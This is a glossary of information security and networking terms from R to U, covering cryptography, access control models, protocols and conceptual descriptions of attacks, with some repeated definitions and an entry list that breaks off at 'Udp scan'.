Rivest-shamir-adleman (rsa) is one of the first practical public-key cryptosystems and is widely used for secure data transmission. Rsa is an algorithm for asymmetric cryptography, invented in 1977 by ron rivest, adi shamir, and leonard adleman. This is based on the practical difficulty of factoring the product of two large prime numbers, the factoring problem.
Role based access control
Role based access control (rbac) assigns users to roles based on their organizational functions and determines authorization based on those roles. It is used by enterprises with more than 500 employees, and can implement mandatory access control (mac) or discretionary access control (dac).
Root is the user name or account that by default has access to all commands and files on a linux or other unix-like operating system. It is also referred to as the root account, root user and the super user.
A rootkit is a type of malicious software that is activated each time the system boots up. Rootkits are difficult to detect as they are activated before your system’s operating system has completely booted up.
A router is a device that forwards or transfers data packets across networks. A router is connected to at least two networks, commonly two lans or wans or a lan and its isp’s network. Routers are located at gateways, the places where two or more networks connect.
Routing information protocol rip
The routing information protocol (rip) defines a manner for routers to share information on how to route traffic among various networks. Rip is classified by the internet engineering task force (ietf) as an interior gateway protocol (igp), one of several protocols for routers moving traffic around within a larger autonomous system network.
Routing loop
A routing loop is where two or more poorly configured routers repeatedly exchange the same data packet over and over. In case of distance vector protocols, the fact that these protocols route by rumor and have a slow convergence time can cause routing loops.
Rpc scans
Rpc scans determine which rpc services are running on a machine.
Rule set based access control rsbac
Rule set based access control (rsbac) targets actions based on rules for entities operating on objects. Rsbac is an open source access control framework for current linux kernels, which has been in stable production use since january 2000.
Scoping guidance
Scoping guidance is a part of tailoring guidance providing organizations with specific policy/regulatory-related, technology-related, system component allocation-related, operational/environmental-related, physical infrastructure-related, public access-related, scalability-related, common control-related, and security objective-related considerations on the applicability and implementation of individual security controls in the security control baseline. Scoping guidance is also specific factors related to technology, infrastructure, public access, scalability, common security controls, and risk that can be considered by organizations in the applicability and implementation of individual security controls in the security control baseline.
Safeguarding statement
A safeguarding statement is a statement affixed to a computer output or printout that states the highest classification being processed at the time the product was produced and requires control of the product, at that level, until determination of the true classification by an authorized individual. Synonymous with banners.
Safeguards are protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.
Safety is defined as the requirement to ensure that the individuals involved with an organization, including employees, customers, and visitors, are safeguarded from any kind of malicious act or attack.
Salt is a non-secret value that is used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker.
Sandboxing is a method of isolating application modules into distinct fault domains enforced by software. Sandboxing is a technique which allows untrusted programs written in an unsafe language, such as c, to be executed safely within the single virtual address space of an application. Untrusted machine interpretable code modules are transformed so that all memory accesses are confined to code and data segments within their fault domain. Access to system resources can also be controlled through a unique identifier associated with each domain. A restricted, controlled execution environment that prevents potentially malicious software, such as mobile code, from accessing any system resources except those for which the software is authorized.
Sanitization is the process to remove information from media such that information recovery is not possible. It includes removing all labels, markings, and activity logs. A general term referring to the actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means.
S box
A s-box is a nonlinear substitution table used in several byte substitution transformations and in the key expansion routine to perform a one-for-one substitution of a byte value.
Scanning is sending packets or requests to another system to gain information to be used in a subsequent attack.
Scatternet is a chain of piconets created by allowing one or more bluetooth devices to each be a slave in one piconet and act as the master for another piconet simultaneously. A scatternet allows several devices to be networked over an extended distance.
Scavenging is the process of searching through data residue in a system or a network to gain unauthorised knowledge of sensitive information.
Secret key symmetric cryptographic algorithm
Secret key (symmetric) cryptographic algorithm is a cryptographic algorithm that uses a single secret key for both encryption and decryption. A cryptographic algorithm that uses a single key (i.e., a secret key) for both encryption and decryption.
Secret key
A secret key is a cryptographic key that is used with a secret-key (symmetric) cryptographic algorithm that is uniquely associated with one or more entities and is not made public. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure. A secret key is also a cryptographic key that is used with a symmetric cryptographic algorithm that is uniquely associated with one or more entities and is not made public. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure. A secret key is also a cryptographic key that must be protected from unauthorized disclosure to protect data encrypted with the key. The use of the term “secret” in this context does not imply a classification level; rather, the term implies the need to protect the key from disclosure or substitution. A secret key is also a cryptographic key that is uniquely associated with one or more entities. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure or substitution. Secret key – a cryptographic key, used with a secret key cryptographic algorithm, that is uniquely associated with one or more entities and should not be made public.
Secret seed
A secret seed is a secret value used to initialize a pseudorandom number generator.
Secure communication protocol
Secure communication protocol is a communication protocol that provides the appropriate confidentiality, authentication, and content-integrity protection.
Secure communications
Secure communications are telecommunications deriving security through use of nsa-approved products and/or protected distribution systems. Configuring and operating dns servers so that the security goals of data integrity and source authentication are achieved and maintained.
Secure electronic transactions set
A secure electronic transaction (set) is a communications protocol standard for securing credit card transactions over insecure networks. Set ensures that all parties (customers, merchant, and bank) are authenticated using digital signatures, encryption protects the message and provides integrity, and provides end-to-end security for credit card transactions online.
Secure erase
Secure erase is an overwrite technology using a firmware-based process to overwrite a hard drive. Is a drive command defined in the ansi ata and scsi disk drive interface specifications, which runs inside drive hardware. It completes in about 1/8 the time of 5220 block erasure.
Secure hash algorithm sha
Secure hash algorithm (sha) is a hash algorithm with the property that is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.
Secure hash standard
The secure hash standard specifies secure hash algorithms -sha-1, sha-224, sha-256, sha-384, sha-512, sha-512/224 and sha-512/256 -for computing a condensed representation of electronic data (message). When a message of any length less than 2 64 bits (for sha-1, sha224 and sha-256) or less than 2 128 bits (for sha-384, sha-512, sha-512/224 and sha-512/256) is input to a hash algorithm, the result is an output called a message digest. The message digests range in length from 160 to 512 bits, depending on the algorithm. Secure hash algorithms are typically used with other cryptographic algorithms, such as digital signature algorithms and keyed-hash message authentication codes, or in the generation of random numbers (bits). The hash algorithms specified in this standard are called secure because, for a given algorithm, it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest. Any change to a message will, with a very high probability, result in a different message digest. This will result in a verification failure when the secure hash algorithm is used with a digital signature algorithm or a keyed-hash message authentication algorithm. In addition, a secure hash standard is a specification for a secure hash algorithm that can generate a condensed message representation called a message digest.
Secure shell ssh
A secure shell (ssh) is also known as a secure socket shell. Ssh is a unix-based command interface and protocol used to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another.
Secure sockets layer ssl
A secure sockets layer (ssl) is the standard security technology for establishing an encrypted link between a web server and a browser. Ssl was developed by netscape for transmitting private documents via the internet.
Secure state
Secure state is a condition in which no subject can access any object in an unauthorized manner.
Secure subsystem
A secure subsystem is a subsystem containing its own implementation of the reference monitor concept for those resources it controls. Secure subsystem must depend on other controls and the base operating system for the control of subjects and the more primitive system objects
Security assertion markup language saml
Security assertion markup language (saml) is an xml-based security specification developed by the organization for the advancement of structured information standards (oasis) for exchanging authentication (and authorization) information between trusted entities over the internet. A framework for exchanging authentication and authorization information. Security typically involves checking the credentials presented by a party for authentication and authorization. Saml standardizes the representation of these credentials in an xml format called “assertions,” enhancing the interoperability between disparate applications. A protocol consisting of xml-based request and response message formats for exchanging security information, expressed in the form of assertions about subjects, between online business partners.
Security association
A security association is a relationship established between two or more entities to enable them to protect data they exchange.
Security attribute
A security attribute is a security-related quality of an object. Security attributes may be represented as hierarchical levels, bits in a bit map, or numbers. Compartments, caveats, and release markings are examples of security attributes. A security attribute is also an abstraction representing the basic properties or characteristics of an entity with respect to safeguarding information; typically associated with internal data structures (e.g., records, buffers, files) within the information system which are used to enable the implementation of access control and flow control policies; reflect special dissemination, handling, or distribution instructions; or support other aspects of the information security policy.
Security authorization boundary
A security authorization boundary is an information security area that includes a grouping of tools, technologies, and data.
Security banner
A security banner is a banner at the top or bottom of a computer screen that states the overall classification of the system in large, bold type. A security banner can also refer to the opening screen that informs users of the security implications of accessing a computer resource.
Security categorization
Security categorization is the process of determining the security category for information or an information system. The process of determining the security category for information or an information system. Security categorization methodologies are described in cnss instruction 1253 for national security systems and in fips 199 for other than national security systems.
Security category
Security category is the characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, or individuals. It is also the characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, individuals, other organizations, and the nation.
Security concept operations
Security concept of operations is a security-focused description of an information system, its operational policies, classes of users, interactions between the system and its users, and the system’s contribution to the operational mission.
Security content automation protocol scap
Security content automation protocol (scap) is a method for using specific standardized testing methods to enable automated vulnerability management, measurement, and policy compliance evaluation against a standardized set of security requirements.
Security control assessment
Security control assessment is the testing and/or evaluation of the management, operational, and technical security controls in an information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system. Security control assessment is the testing and/or evaluation of the management, operational, and technical security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system and/or enterprise.
Security control assessor
A security control assessor is the individual, group, or organization responsible for conducting a security control assessment.
Security control baseline
A security control baseline is the set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system. One of the sets of minimum security controls defined for federal information systems in nist special publication 800-53 and cnss instruction 1253.
Security control effectiveness
Security control effectiveness is the measure of correctness of implementation (i.e., how consistently the control implementation complies with the security plan) and how well the security plan meets organizational needs in accordance with current risk tolerance.
Security control enhancements
Security control enhancements are statements of security capability to 1) build in additional, but related, functionality to a basic control; and/or 2) increase the strength of a basic control. Statements of security capability to: (i) build in additional, but related, functionality to a security control; and/or (ii) increase the strength of the control.
Security control inheritance
Security control inheritance is a situation in which an information system or application receives protection from security controls (or portions of security controls) that are developed, implemented, assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides. See common control.
Security controls baseline
Security controls baseline is the set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.
Security controls
Security controls are the management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information.
Security domain
A security domain is a set of subjects, their information objects, and a common security policy; it is also a collection of entities to which applies a single security policy executed by a single authority. A domain that implements a security policy and is administered by a single authority.
Security engineering
Security engineering is an interdisciplinary approach and means to enable the realization of secure systems. It focuses on defining customer needs, security protection requirements, and required functionality early in the systems development life cycle, documenting requirements, and then proceeding with design, synthesis, and system validation while considering the complete problem.
Security fault analysis sfa
Security fault analysis is an assessment, usually performed on information system hardware, to determine the security properties of a device when hardware fault is encountered.
Security features user's guide
(sfug) a security features users guide is a guide or manual explaining how the security mechanisms in a specific system work.
Security filter
Security filter is a secure subsystem of an information system that enforces security policy on the data passing through it.
Security functions
Security functions are the hardware, software, and/or firmware of the information system responsible for enforcing the system security policy and supporting the isolation of code and data on which the protection is based.
Security goals
Security goals are the five security goals are confidentiality, availability, integrity, accountability, and assurance.
Security impact analysis
Security impact analysis is the analysis conducted by an organizational official to determine the extent to which changes to the information system have affected the security state of the system.
Security information event management siem tool
Security information and event management (siem) tool is an application that provides the ability to gather security data from information system components and present that data as actionable information via a single interface.
Security inspection
A security inspection is the examination of an information system to determine compliance with security policy, procedures, and practices.
Security kernel
A security kernel is the hardware, firmware, and software elements of a trusted computing base implementing the reference monitor concept. A security kernel must mediate all accesses, be protected from modification, and be verifiable as correct.
Security label
A security label is a marking bound to a resource (which may be a data unit) that names or designates the security attributes of that resource. Information that represents or designates the value of one or more security relevant-attributes (e.g., classification) of a system resource.
Security level
A security level is a hierarchical indicator of the degree of sensitivity to a certain threat. It implies, according to the security policy being enforced, a specific level of protection.
Security management dashboard
A security management dashboard is a tool that consolidates and communicates information relevant to the organizational security posture in near real-time to security management stakeholders. Security marking – human-readable information affixed to information system components, removable media, or output indicating the distribution limitations, handling caveats, and applicable security markings
Security markings
Security markings are human-readable indicators applied to a document, storage media, or hardware component to designate security classification, categorization, and/or handling restrictions applicable to the information contained therein. For intelligence information, security markings could include compartment and sub-compartment indicators and handling restrictions.
Security mechanism
A security mechanism is a device designed to provide one or more security services usually rated in terms of strength of service and assurance of the design.
Security net control station
A security net control system is a management system overseeing and controlling implementation of network security policy.
Security objective
A security objective pertains to confidentiality, integrity, or availability.
Security perimeter
A security perimeter is a physical or logical boundary that is defined for a system, domain, or enclave, within which a specified security policy or security architecture is applied.
Security plan
A security plan is a formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements.
Security policy
Security policy is a set of rules and practices that specify how a system or organization delivers security services to protect sensitive and critical information.
Security posture
The security status of an enterprise’s networks, information, and systems based on resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes.
Security program plan
A security management plan is a formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management security controls and common security controls in place or planned for meeting those requirements.
Security range
A security range is the highest and lowest security levels that are permitted in or on an information system, system component, subsystem, or network.
Security relevant change
A security relevant change is any change to a system’s configuration, environment, information content, functionality, or users which has the potential to change the risk imposed upon its continued operations.
Security relevant event
A security relevant event is an occurrence (e.g., an auditable event or flag) considered to have potential security implications to the system or its environment that may require further action (noting, investigating, or reacting).
Security relevant information
Security relevant information is any information within the information system that can potentially impact the operation of security functions in a manner that could result in failure to enforce the system security policy or maintain isolation of code and data.
Security requirements baseline
Security requirements baseline is the description of the minimum requirements necessary for an information system to maintain an acceptable level of risk.
Security requirements traceability matrix srtm
A security requirements traceability matrix (srtm) is a matrix that captures all security requirements linked to potential risks and addresses all applicable c&a requirements. It is, therefore, a correlation statement of a system’s security features and compliance methods for each security requirement.
Security requirements
Security requirements are requirements levied on an information system that are derived from applicable laws, executive orders, directives, policies, standards, instructions, regulations, or procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.
Security safeguards
Security safeguards are protective measures and controls prescribed to meet the security requirements specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices
Security service
A security service is a capability that supports one, or many, of the security goals. Examples of security services are key management, access control, and authentication. A capability that supports one, or more, of the security requirements (confidentiality, integrity, availability). Examples of security services are key management, access control, and authentication.
Security specification
Security specification is the detailed description of the safeguards required to protect an information system.
Security strength
Security strength is a measure of the computational complexity associated with recovering certain secret and/or security-critical information concerning a given cryptographic algorithm from known data (e.g. Plaintext/ciphertext pairs for a given encryption algorithm). It is also a number associated with the amount of work (that is, the number of operations) that is required to break a cryptographic algorithm or system. Sometimes referred to as a security level.
Security tag
A security tag is an information unit containing a representation of certain security related information (e.g., a restrictive attribute bitmap).
Security target
A security target is a common criteria specification that represents a set of security requirements to be used as the basis of an evaluation of an identified target of evaluation (toe).
Security test evaluation ste
A security test and evaluation is an examination and analysis of the safeguards required to protect an information system, as they have been applied in an operational environment, to determine the security posture of that system.
Security testing
Security testing is the process to determine that an information system protects data and maintains functionality as intended.
Security is a condition that results from the establishment and maintenance of protective measures that enable an enterprise to perform its mission or critical functions despite risks posed by threats to its use of information systems. Protective measures may involve a combination of deterrence, avoidance, prevention, detection, recovery, and correction that should form part of the enterprise’s risk management approach.
Seed key
A seed key is an initial key used to start an updating or key generation process
A segment is another name for tcp packets. Dividing an ethernet into multiple segments is one of the most common ways of increasing available bandwidth on the lan.
Sensitive information
Sensitive information is data that must be protected from unauthorised access to safeguard the privacy or security of an individual, organisation, or nation. Information sensitivity is the control of access to information or knowledge that might result in loss of an advantage or level of security, if disclosed to others.
Separation of duties
Separation of duties (sod) is also known as “segregation of duties”. It is based on the principle of splitting privileges among multiple individuals or systems.
A server is a computer entity or a machine that waits for requests from other machines or software (clients) and responds to them. The purpose of a server is to share data or hardware and software resources among clients.
Session hijacking
Session hijacking is also known as cookie hijacking. It is an exploitation of a valid computer session, sometimes also called a session key, to gain unauthorised access to sensitive information or services in a computer system or network.
Session key
A session key is a key that is temporary or is used for a relatively short period of time. It is an encryption and decryption key that is randomly generated to ensure the security of a communications session between a user and another computer or between two computers. These keys are sometimes called symmetric keys, because the same key is used for both encryption and decryption.
A session is a virtual connection between two hosts by which network traffic is passed. It is a way to store information (in variables) to be used across multiple pages.
Secure hash algorithm 1 (sha-1) is a cryptographic hash function designed by the united states national security agency and is a u.s. federal information processing standard published by the united states nist.
Shadow password files
Shadow password files are system files where encrypted user passwords are stored so that they aren’t available to people who try to break into the system.
A share is any resource that has been made public on a system or network, such as a directory (file share) or printer (printer share).
Shell is a unix term for the interactive user interface with an operating system. The shell is the layer of programming that recognises and executes the commands that a user enters. In some systems, the shell is called a command interpreter.
Signals analysis
Signals analysis is a process of gaining indirect knowledge of communicated data by monitoring and analysing a signal that is emitted by a system and that contains the data, but is not intended to communicate the data.
A signature is a distinct pattern in network traffic that can be identified by a specific tool.
Simple integrity property
In simple integrity property, a user cannot write data to a higher integrity level than their own.
Simple network management protocol snmp
Simple network management protocol (snmp) is an internet-standard protocol for managing devices on ip networks. Devices that typically support snmp include routers, switches, servers, workstations, printers, modem racks and more. Snmp is widely used in network management systems to monitor network-attached devices for conditions that warrant administrative attention.
Simple security property
In simple security property, a user cannot read data of a higher classification than their own.
An s/key is a one-time password mechanism developed for authentication to unix-like operating systems, particularly from dumb terminals or untrusted public computers. This mechanism uses a cryptographic hash function to generate a sequence of 64-bit, one-time passwords for remote user login. Since each password is only used once, the user is protected from password sniffers.
A smart card is an electronic badge that includes a magnetic strip or chip that can record and replay a set key. The card connects to a reader with direct physical contact or with a remote contactless radio frequency interface.
An s/mime is a set of specifications for securing electronic mail. Secure/ multipurpose internet mail extensions (s/mime) is based upon the widely used mime standard and describes a protocol for adding cryptographic security services through mime encapsulation of digitally signed and encrypted objects. The basic security services offered by s/mime are authentication, non-repudiation of origin, message integrity, and message privacy. Optional security services include signed receipts, security labels, secure mailing lists, and an extended method of identifying the signer’s certificate(s).
Smurf attack
A smurf attack is a distributed denial-of-service attack in which large numbers of internet control message protocol (icmp) packets with the intended victim’s spoofed source ip are broadcast to a computer network using an ip broadcast address. Most devices on a network respond to this by sending a reply to the source ip address. This can slow down the victim’s computer to the point where it becomes impossible to work on.
A sniffer is a tool that monitors network traffic that is received in a network interface.
Sniffing is also known as passive wiretapping. Packet sniffing allows individuals to capture data as it is transmitted over a network. Packet sniffer programs are used by network professionals to diagnose network issues and by malicious users to capture unencrypted data like passwords and usernames in network traffic. Once this information is captured, the user can then gain access to the system or network.
Social engineering
Social engineering is a non-technical technique that intrusion hackers commonly use. This approach relies on human interaction and often involves tricking people into breaking normal security procedures.
Socket pair
A socket pair is a way to uniquely specify a connection, i.e., source ip address, source port, destination ip address, destination port.
A socket is an endpoint for communication between two systems. The socket tells a host’s ip stack where to plug in a data stream so that it connects to the right application.
Socket secure (socks) is an internet protocol that routes network or data packets between a client and server through a proxy server. Socks ensures proper authentication of users and allows authorised users only to access a server. Socks uses sockets to represent and keep track of individual connections. The client side of socks is built into certain web browsers and the server side can be added to a proxy server.
Software is any computer instructions, data, or programs that can be stored electronically and executed by computer hardware. While running any software, associated data that is stored in the hardware may be dynamically written or modified.
Source port
A source port is a port that a host uses to connect to a server. It is usually a number greater than or equal to 1024. It is randomly generated and is different each time a connection is established.
Spam is the term used for flooding the internet with many copies of the same message, in an attempt to force the message on individuals who would not otherwise choose to receive it. Most spam mails or messages are commercial advertising, often for dubious products, get-rich-quick schemes, or quasi-legal services.
Spanning port
A spanning port is used to configure the switch to behave like a hub for a specific port.
Split horizon
A split horizon is an algorithm used to prevent routing loops in distance-vector routing protocols by prohibiting a router from advertising a route back onto the interface from which it was learned.
Split key
A split key is a cryptographic key that is divided into two or more separate data items that individually convey no knowledge of the whole key or information that results from combining the items.
A spoof is an attack attempt by an unauthorized entity or attacker to gain illegitimate access to a system by posing as an authorized user.
Sql injection
Sql injection is a code injection technique that is used to attack data-driven applications, in which malicious or manipulative sql statements are inserted into an entry field for execution.
Stack smashing
Stack smashing is used to cause a stack in a computer application or operating system to overflow. This makes it possible to weaken the program or system or cause it to crash. The stack is also called a pushdown stack or first-in last-out circuit. It is a form of buffer that holds the intermediate results of an operation or data that is awaiting processing.
Standard acls cisco
Standard access control lists (acls) are essentially a set of commands, grouped together by a number or name that is used to filter traffic entering or leaving an interface. Acls make packet filtering decisions based on source ip address only.
Star network
Star networks are one of the most common computer network topologies. A star network consists of one central switch, hub or computer, which acts as a conduit to transmit messages. This consists of a central node, to which all other nodes are connected. The central node provides a common connection point for all nodes through a hub.
Star property
A star property is a user who is unable to write data to a lower classification level without logging in at that lower classification level when using star property.
State machine
A state machine is any device that stores the status of something at a given time and can operate on input to change the status and cause an action to take place for any given change. A computer is basically a state machine and each machine instruction is input that changes one or more states and may cause other actions to take place. Each computer’s data register stores a state. The read-only memory from which a boot program is loaded stores a state.
Stateful inspection
Stateful inspection is also known as dynamic packet filtering. It is a firewall technology that monitors the state of active connections and uses this information to determine which network packets to allow through the firewall.
Static host tables
Static host tables are text files that contain hostname and address mapping.
Static routing
Static routing is a form of routing that occurs when a router uses a manually-configured routing entry, rather than information from a dynamic routing traffic. Static routing can also be used in stub networks, or to provide a gateway of last resort.
Stealthing is a term that refers to approaches used by malicious code to conceal its presence on the infected system.
Steganalysis is the study of detecting and defeating the use of steganography. This is analogous to cryptanalysis applied to cryptography.
Steganography is a technique used to hide the existence of a message, files, or any other information. The first recorded use of the term was in 1499 by Johannes Trithemius in his steganographia. This is different from cryptography, which hides the meaning of a message but does not hide the message itself. An example of a steganographic method is the invisible ink.
Stimulus is network traffic that initiates a connection or solicits a response.
Store and forward
Store-and-forward is a telecommunications technique in which information is sent to an intermediate station where it is kept and sent at a later time to the final destination or to another intermediate station.
Straight through cable
A straight-through cable is a type of twisted pair cable that is used in local area networks to connect a computer to a network hub such as a router. This type of cable is also sometimes called a patch cable and is an alternative to wireless connections where one or more computers access a router through a wireless signal.
Stream cipher
A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream. In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the ciphertext stream.
Strong star property
In strong star property, a user cannot write data to higher or lower classifications levels than their own.
Sub network
A sub network is a separately identifiable part of a larger network that typically represents a certain limited number of host computers, the hosts in a building or geographic area, or the hosts on an individual local area network.
Subnet mask
A subnet mask is used to determine the number of bits that are used for the subnet and host portions of the address. It is used as a screen of numbers used for routing traffic within a subnet. Once a packet has arrived at a gateway or connection point with its unique network number, it can be routed to its destination within the internal gateways using the subnet number.
A switch is also called switching hub, bridging hub, officially mac bridge. It is a computer networking device that connects devices together on a computer network by using packet switching to receive, process and forward data to the destination device.
Switched network
A stitched network is a fully switched network is a computer network that uses only network switches rather than network hubs on ethernet local area networks. The switches allow for a dedicated connection to each workstation. A switch allows for many conversations to occur simultaneously.
Symbolic links
Symbolic links are sometimes also known as symlinks. Symbolic links are essentially advanced shortcuts that point to another file.
Symmetric cryptography
Symmetric cryptography is a branch of cryptography involving algorithms that use symmetrical keys for two different steps of the algorithm. Symmetric cryptography is called secret-key cryptography because the entities that share the key.
Symmetric key
A symmetric key is a cryptographic key that is used in a symmetric cryptographic algorithm.
Syn flood
A syn flood is a type of denial-of-service attack in which an attacker sends a succession of syn requests to a target’s system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Synchronization is the signal made up of a distinctive pattern of bits that network hardware looks for to signal that start of a frame. Synchronization refers to one of two distinct but related concepts: synchronization of processes, and synchronization of data.
A syslog is a widely used standard for message logging facility in unix systems. It permits separation of the software that generates messages, the system that stores them, and the software that reports and analyzes them.
System security officer sso
A system security officer (sso) is an individual responsible for enforcement or administration of the security policy that applies to the system.
system specific policy
A system-specific policy is a policy written for a specific system or device and may change with changes in the system or device, its functionality, or its vulnerabilities.
T1 t3
A t1, t3 is a digital circuit using tdm (time-division multiplexing).
Tamper is defined as deliberately trying to change or alter a system’s logic, data, or control information to cause the system to perform unauthorized functions or services.
Tcp fingerprinting
Tcp/ip stack fingerprinting is the passive collection of configuration attributes from a remote device during standard layer 4 network communications. The combination of parameters may be used to infer the remote machine’s operating system (os), or incorporated into a device fingerprint.
Tcp full open scan
A tcp full open scan checks each and every port after performing a full three-way handshake on each port to determine if it was open.
Tcp half open scan
A tcp half open scan determines if a port is open by performing the first half of a three-way handshake. It is also referred to as the syn scanning. In syn scanning, the hostile client or attacker attempts to set up a tcp/ip connection with a server at every possible port. This is done by sending a syn (synchronization) packet, as if to initiate a three-way handshake, to every port on the server.
Tcp wrapper
A tcp wrapper is a software package that is used to restrict access to certain network services based on the source of the connection. In other words, it is a host-based networking acl system, used to filter network access to internet protocol servers on (unix-like) operating systems such as gnu/linux or bsd.
A tcpdump is a freeware protocol analyzer for unix systems that can monitor network traffic on a wire. It allows the user to display tcp/ip and other packets being transmitted or received over a network. Tcpdump works on most unix-like operating systems: linux, solaris, bsd, os x, hp-ux, android and aix among others. It was originally written in 1987 by van jacobson, craig leres and steven mccanne who were working in the lawrence berkeley laboratory network research group.
Tcp ip
Tcp/ip stands for transmission control protocol/internet protocol. It is a basic communication language or protocol of the internet and can be used as a communications protocol in a private network as well (either an intranet or an extranet).
Telnet is a tcp-based, application-layer, internet standard protocol and an essential tcp/ip protocol for accessing remote computers. Through telnet, an administrator or another user can access someone else’s computer remotely.
Threat agent
Threat assessment
Threat assessment is a structured process used to identify and evaluate various risks or threats that an organization might be exposed to.
Threat model
A threat model is a process that is used to optimize network security by identifying the key objectives and vulnerabilities, and then defining countermeasures to prevent, or mitigate the effects of, threats to the system or network.
Threat vector
A threat vector is a methodology that a threat uses to get to the target.
A threat is a possible danger that might exploit a vulnerability to violate security protocols and thus, cause possible harm. A threat can be either deliberate (example, an individual cracker or a criminal organization) or accidental (example, the possibility of a computer malfunctioning, or the possibility of a natural disaster such as an earthquake, a fire, or a tornado) or otherwise a circumstance, capability, action, or event.
Time to live
Time to live (ttl) or the hop limit is a mechanism that limits the lifespan of data in a computer or network. Ttl is generally implemented as a counter or time stamp attached to or embedded in the data. Ttl value in an ip data packet tells a network router whether or not the packet has been in the network too long and should be discarded.
Tiny fragment attack
A tiny fragment attack is ip fragmentation that is the process of breaking up a single internet protocol (ip) datagram into multiple packets of smaller size. Every network link has a characteristic size of messages that may be transmitted, called the maximum transmission unit (mtu). If the data packet size is made small enough to force some of a tcp packet’s tcp header fields into the second data fragment, filter rules that specify patterns for those fields will not match. If the filtering implementation does not enforce a minimum fragment size, a disallowed packet might be passed because it didn’t hit a match in the filter. Std 5, rfc 791 states that, “every internet module must be able to forward a datagram of 68 octets without further fragmentation.” This is because an internet header may be up to 60 octets, and the minimum fragment is 8 octets. Ip fragmentation exploits (attacks) use the fragmentation protocol within ip as an attack vector.
Token based access control
Token-based access control is an authentication method that offers additional security. Using this method, each user has a smart card or token that either displays a constantly changing password, passkey, or buttons that calculate a new password based on a challenge phrase. Without this card or token, it is impossible to authenticate yourself to the system. This two-factor authentication provides additional security by requiring an attacker to both guess the user’s password and steal the smart card or token that is used to access the system.
Token based devices
A token-based device or a security token is known by several names such as, hardware token, authentication token, usb token, cryptographic token, software token, virtual token, or key fob. A security token may be a physical device that an authorized user is given to access a system or network. Security tokens are used to prove one’s identity electronically and are used in addition to or in place of a password to prove that the customer is who they claim to be. The token acts like an electronic key to access something.
Token ring
A token ring network is a local area network in which all computers are connected in a ring or star topology and a binary digit or token-passing scheme is used in order to prevent the collision of data between two computers that want to send messages at the same time. It uses a special three-byte frame called a “token” that travels around a logical “ring” of workstations or servers.
Topology is the geometric arrangement of a computer system. Common topologies include a bus, star, and ring. Two networks have the same topology if the connection configuration is the same, although the networks may differ in physical interconnections, distances between nodes, transmission rates, and/or signal types.
Traceroute tracert exe
Traceroute is a tool that maps the route a packet takes from the local machine to a remote destination. The history of the route is recorded as the round-trip times of the packets received from each successive host (remote node) in the route (path). The sum of the mean times in each hop indicates the total time spent to establish the connection.
Transmission control protocol tcp
Transmission control protocol (tcp) is a set of rules or protocol that is used along with the internet protocol to send data in the form of message units between computers over the internet. Whereas the ip protocol deals only with packets, tcp enables two hosts to establish a connection and exchange streams of data. Tcp takes care of keeping track of the individual units of data called packets. Tcp guarantees delivery of data and also guarantees that packets will be delivered in the same order in which they were sent. It originated in the initial network implementation in which it complemented the internet protocol (ip). Therefore, the entire suite is commonly referred to as tcp/ip.
Transport layer security tls
Transport layer security (tls) is a protocol that ensures privacy between communicating applications and the users on the internet. When a server and client communicate, tls ensures that no third party may overhear or tamper with any message. Tls is the successor to the secure sockets layer (ssl).
Triple des
Triple des (3des) is the common name for the triple data encryption algorithm (tdea or triple dea) symmetric-key block cipher, which applies the data encryption standard (des) cipher algorithm three times to each data block. It transforms each 64-bit plaintext block by applying the des three successive times, using either two or three different keys, for an effective key length of 112 or 168 bits.
Triple wrapped
Triple wrapped describes any data that has been signed with a digital signature, encrypted, and then signed again is called triple-wrapped.
Trojan horse
A trojan horse is a computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorization of a system entity that invokes the program.
Trunking is a method for a system to provide network access to many clients by sharing a set of lines or frequencies instead of providing them individually. This is analogous to the structure of a tree with one trunk and many branches.
Trust determines which permissions and what actions other systems or users can perform on remote machines.
Trusted certificate
A trusted certificate is any digital certificate that a certificate user accepts as being valid without testing the certificate to validate it as the final certificate on a certification path; especially a certificate that is used as a trust anchor certificate.
Trusted ports
Trusted ports are ports below number 1024 usually allowed to be opened by the root user.
A tunnel is a communication channel that is created in a computer network by encapsulating a communication protocol’s data packets in a second protocol that normally would be carried above, or at the same layer as, the first one. Most often, a tunnel is a logical point-to-point link created by encapsulating the layer 2 protocol in a transport protocol (such as tcp), in a network or inter-network layer protocol (such as ip), or in another link layer protocol. Tunneling can move data between computers that use a protocol not supported by the network connecting them.
Udp scan
